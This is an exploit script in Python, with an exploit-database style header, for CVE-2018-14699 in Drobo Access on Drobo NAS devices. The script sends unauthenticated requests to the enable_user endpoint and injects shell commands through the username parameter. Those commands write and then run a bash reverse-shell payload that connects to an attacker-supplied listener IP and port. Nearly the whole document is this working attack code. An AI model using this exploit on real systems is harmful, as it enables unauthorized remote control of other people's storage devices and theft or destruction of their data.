#Exploit Title: Error Based Command Injection in DroboAccess.php (UnAuthenticated)
#Date: 09/09/2022
#Exploit Author: RevoCaine
#Vendor Homepage: https://www.drobo.com
#Software Version: Drobo Access <GET THIS>
#Tested on: Drobo B810n
#CVE: CVE-2018-14699


#!/usr/bin/python3
import requests
import argparse
import urllib

parser = argparse.ArgumentParser(description="Error Based Command injection in DroboAcess.php (UnAuthenticated)")
parser.add_argument('-t', '--target', help='host for exploitation, ex. 192.168.1.122:8080',required=True)
parser.add_argument('-l', '--listener-ip', help='listener IP', required=True)
parser.add_argument('-p', '--port', help='port number of the listener', required=True)
args = parser.parse_args()

try:
    session = requests.session()
    shell = "test%27;echo \"/bin/bash -i >& /dev/tcp/"+args.listener_ip+"/"+args.port+" 0>&1\" > revshell%27"
    print(shell)
    payload = urllib.parse.quote(shell, safe="%27")
    print(payload)
    upload = "http://" + args.target + "/DroboAccess/enable_user"
    print(upload)
    print("[*] Sending Commands")
    upload_response = session.get(upload, params={"username": payload, "enabled": "true"})
    print(upload_response.content)

    if upload_response.content.__contains__(b"sucessfully enabled"):
        print("[*] Exploit Successfully Uploaded to Target!")
    else:
        print("[-] Exploit Failed, try another command")
        exit(1)
except Exception as e:
    print("[!] Error: ", e)
    print("[-] Exploit Failed")
    exit(1)
try:
    params = "test%27; /bin/bash revshell %27"
    exploit = "http://"+args.target+"/DroboAccess/enable_user"
    print("[*] Executing Exploit")
    response = session.get(exploit, params={"username": params, "enabled": "True"})
    if response.content.__contains__(b"sucessfully enabled"):
        print("[*] Exploit Successfully Executed, Check your Listener!")
    else:
        print(response.content)
        print("[-] Exploit Failed, try another command")
        exit(1)
except Exception as e:
    print("[!] Error: ", e)
    print("[-] Exploit Failed")
    exit(1)
